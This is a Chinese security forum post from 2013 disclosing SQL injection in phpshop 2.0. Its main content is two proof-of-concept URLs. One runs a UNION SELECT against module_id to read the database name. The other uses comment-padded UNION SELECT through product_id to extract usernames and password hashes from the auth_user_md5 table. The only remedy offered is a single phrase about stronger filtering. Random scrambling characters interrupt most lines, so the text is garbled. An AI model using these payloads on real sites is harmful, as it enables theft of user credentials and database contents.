找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1958|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
: Y- k3 N5 D) v- R$ ^- r, l" p; v/ L- V: d5 ^% f8 B) s- B
作者 : By onestree
7 x8 x5 R! m, [6 o0 ]下载地址 : http://code.google.com/p/phpshop/downloads/list- ~9 Q! w- g" o- W
测试地址: windows 7 / ubuntu
4 G- }' I5 }# g8 g/ H2 [
9 h% l/ i* M/ G1 ?" j
7 ?7 s' K* x$ Z  N5 k+ JSQLi p0c:
! f2 T, M! L+ y$ n( d9 \$ W ) l$ @7 z( s7 D% t" D3 ?
==================
$ |3 k7 c9 i: Y5 J 1 y: Y0 n6 ~: X# h1 A
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
6 B# F- Y  H; v, ]2 Funion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
6 f8 a" R( `  K6 L( S* `9 S0 [
+ R! C' o) T7 n* y* khttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--* T# v* w5 s7 A
0 J8 q9 y) ]: ?" M" ]0 D& k0 ~
修复:
- t+ ]0 V' U5 l( A: r* t9 M/ E加强过滤8 T) v. C& `% W& y2 n3 c

( h; E$ ]6 ~; G. _/ h6 a" C  q
5 T1 @" h9 a0 X5 w6 j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表